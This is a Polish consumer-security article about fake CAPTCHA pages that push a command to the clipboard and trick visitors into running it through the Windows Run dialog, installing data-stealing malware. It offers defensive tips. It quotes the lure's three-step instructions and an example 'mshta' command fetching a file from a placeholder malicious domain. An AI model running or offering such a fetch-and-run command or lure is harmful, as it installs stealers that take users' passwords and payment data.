Fałszywe strony CAPTCHA: Jak chronić się przed przejęciem schowka i kradzieżą danych?

W sieci pojawiło się nowe, podstępne zagrożenie – fałszywe strony CAPTCHA, które wykorzystują zaawansowane techniki socjotechniczne, aby przejąć kontrolę nad schowkiem użytkowników i zainfekować ich urządzenia złośliwym oprogramowaniem. Jak donosi Pieter Arntz w artykule opublikowanym 10 marca 2025 roku na blogu Malwarebytes, liczba takich witryn rośnie w zastraszającym tempie. Te niebezpieczne strony mogą oszukać nawet ostrożnych internautów, instalując na ich komputerach tzw. „information stealers” – programy wykradające dane, takie jak hasła, loginy czy informacje bankowe. Co więcej, cyberprzestępcy stosują sprytne triki, takie jak używanie domen przypominających legalne adresy, np. captha.pl, aby uśpić czujność użytkowników i sprawić, że ich oszustwo wydaje się wiarygodne. W poniższym artykule wyjaśnimy, jak działają te ataki, jak je rozpoznać i jak się przed nimi chronić, aby Twoje dane pozostały bezpieczne.

Jak działają fałszywe strony CAPTCHA?

Ataki te zaczynają się niewinnie – użytkownik trafia na stronę oferującą popularne treści, takie jak filmy, muzyka, zdjęcia czy artykuły informacyjne. W zamian za dostęp do tych materiałów witryna prosi o potwierdzenie, że „nie jesteś robotem” – coś, co większość z nas zna i uważa za rutynę. Jednak w tym przypadku proces CAPTCHA odbiega od normy. Zamiast prostego kliknięcia w checkbox lub wybrania obrazków, użytkownik otrzymuje nietypowe instrukcje, takie jak:

  1. Naciśnij i przytrzymaj klawisz Windows + R.
  2. W oknie „Uruchom” wklej zawartość schowka (Ctrl + V).
  3. Naciśnij Enter, aby zakończyć weryfikację.

Na ekranie może pojawić się komunikat w stylu: „Nie jestem robotem – ID weryfikacji reCAPTCHA: 8253”. Wydaje się to nieszkodliwe, prawda? Niestety, wykonując te kroki, użytkownik samodzielnie instaluje złośliwe oprogramowanie na swoim urządzeniu. W tle strona internetowa umieszcza w schowku komendę, najczęściej napisaną w PowerShell, która zostaje uruchomiona po wklejeniu i zatwierdzeniu w oknie „Uruchom”.

W przeglądarkach opartych na silniku Chromium (np. Chrome, Edge, Opera), witryna potrzebuje zgody użytkownika, aby zapisać coś do schowka. Cyberprzestępcy obchodzą to, wykorzystując fakt, że kliknięcie w checkbox na pierwszym ekranie jest interpretowane przez system jako zgoda. W efekcie ofiara nieświadomie uruchamia kod, który pobiera i instaluje złośliwe pliki.

Domeny takie jak captha.pl – pułapka na nieuważnych

Cyberprzestępcy idą o krok dalej, aby ich ataki były jeszcze bardziej przekonujące. Tworzą domeny łudząco podobne do legalnych adresów, takie jak captha.pl, które na pierwszy rzut oka wyglądają jak literówka lub wariant popularnego słowa „captcha”. To celowy zabieg – niewielka zmiana w pisowni ma sprawić, że użytkownik nie zauważy nic podejrzanego i uzna stronę za wiarygodną. Tego typu domeny są zaprojektowane, by uśpić Twoją czujność, sugerując, że masz do czynienia z prawdziwym mechanizmem weryfikacji. W rzeczywistości jednak za takimi adresami kryją się pułapki, które mogą kosztować Cię utratę cennych danych.

Co się dzieje po uruchomieniu komendy?

Komenda wklejona do schowka zazwyczaj wygląda niewinnie tylko na pierwszy rzut oka. Widoczna część może być komentarzem, takim jak „Nie jestem robotem”, ale prawdziwe zagrożenie kryje się w niewidocznej części kodu. Przykładowy początek takiej komendy to:

mshta https://{złośliwa.domena}/plik.media

Komenda mshta uruchamia legalny plik wykonywalny Windows mshta.exe, który pobiera złośliwy plik z podanego adresu URL. Nazwy tych plików mogą przypominać popularne formaty, takie jak .mp3, .mp4, .jpg, .jpeg, .swf czy .html, co dodatkowo uśpi czujność użytkownika. W rzeczywistości są to zakodowane skrypty PowerShell, które działają w tle, pobierając główny ładunek złośliwego oprogramowania.

Przez długi czas najczęściej instalowanym malware w takich atakach był Lumma Stealer, ale ostatnio eksperci Malwarebytes zauważyli również kampanie rozprzestrzeniające SecTopRAT. Oba te programy mają jeden cel – kraść wrażliwe dane, takie jak hasła do kont, dane kart płatniczych czy inne poufne informacje przechowywane na urządzeniu ofiary.

Kto jest celem ataków?

Początkowo fałszywe strony CAPTCHA były skierowane głównie do pracowników firm, które mogły stanowić punkt wejścia dla cyberprzestępców do większych organizacji. Jednak z czasem ich popularność wzrosła na tyle, że obecnie każdy użytkownik internetu może natknąć się na takie zagrożenie. Niezależnie od tego, czy przeglądasz filmy, słuchasz muzyki, czy czytasz wiadomości – możesz stać się celem.

Jak się chronić przed fałszywymi stronami CAPTCHA?

Oto kilka kluczowych kroków, które pomogą Ci uniknąć tego zagrożenia:

  1. Nie wykonuj podejrzanych instrukcji: Jeśli strona prosi o wykonanie nietypowych działań, takich jak wklejanie kodu do okna „Uruchom”, zatrzymaj się i zastanów, czy to bezpieczne.
  2. Używaj oprogramowania antywirusowego: Nowoczesne programy, takie jak Malwarebytes, mogą blokować złośliwe witryny i skrypty zanim wyrządzą szkody.
  3. Zainstaluj rozszerzenia do przeglądarki: Dodatki blokujące złośliwe domeny i oszustwa zwiększą Twoje bezpieczeństwo.
  4. Sprawdzaj zawartość schowka: Po odwiedzeniu podejrzanej strony, takiej jak captha.pl, upewnij się, co znajduje się w Twoim schowku, zanim cokolwiek wkleisz.
  5. Wyłącz JavaScript na nieznanych stronach: Dostęp do schowka jest możliwy dzięki funkcji JavaScript document.execCommand(’copy’). Wyłączenie JavaScript zatrzyma takie ataki, choć może utrudnić działanie niektórych legalnych witryn.

Jak wyłączyć JavaScript w popularnych przeglądarkach?

Jeśli chcesz zwiększyć swoje bezpieczeństwo, możesz wyłączyć JavaScript w ustawieniach przeglądarki. Oto instrukcje krok po kroku:

  • Google Chrome:
    1. Kliknij ikonę trzech kropek w prawym górnym rogu i wybierz Ustawienia.
    2. Przejdź do Prywatność i bezpieczeństwo > Ustawienia witryny.
    3. W sekcji Treść kliknij JavaScript.
    4. Przełącz opcję na Nie zezwalaj witrynom na używanie JavaScript.
  • Mozilla Firefox:
    1. Wpisz about:config w pasku adresu i potwierdź Zaakceptuj ryzyko i kontynuuj.
    2. Wyszukaj javascript.enabled.
    3. Kliknij przełącznik, aby zmienić wartość na false.
  • Opera:
    1. Otwórz ustawienia i wybierz Prywatność i bezpieczeństwo.
    2. Przejdź do Ustawienia witryn > JavaScript.
    3. Wybierz Nie zezwalaj witrynom na używanie JavaScript.
  • Microsoft Edge:
    1. Kliknij trzy kropki w prawym górnym rogu i wybierz Ustawienia.
    2. Przejdź do Pliki cookie i uprawnienia witryn > JavaScript.
    3. Wyłącz JavaScript lub dostosuj ustawienia dla konkretnych stron.

Wyłączenie JavaScript może być niewygodne przy codziennym przeglądaniu, dlatego warto rozważyć używanie dwóch przeglądarek – jednej z wyłączonym JavaScript do nieznanych stron i drugiej do zaufanych witryn.

Podsumowanie: Bądź czujny w sieci

Fałszywe strony CAPTCHA, takie jak te podszywające się pod adresy w stylu captha.pl, to sprytne oszustwo, które wykorzystuje naszą rutynę i zaufanie do popularnych mechanizmów weryfikacji. W marcu 2025 roku zagrożenie to stało się powszechne, a cyberprzestępcy nieustannie doskonalą swoje metody. Kluczowe frazy, takie jak „fałszywe CAPTCHA”, „kradzież danych”, „złośliwe oprogramowanie” czy „information stealers”, powinny być Twoim sygnałem ostrzegawczym. Zadbaj o swoje bezpieczeństwo – stosuj się do powyższych zasad, aktualizuj oprogramowanie i nie daj się nabrać na podstępne sztuczki. Twoje dane są zbyt cenne, by ryzykować!

Scroll to Top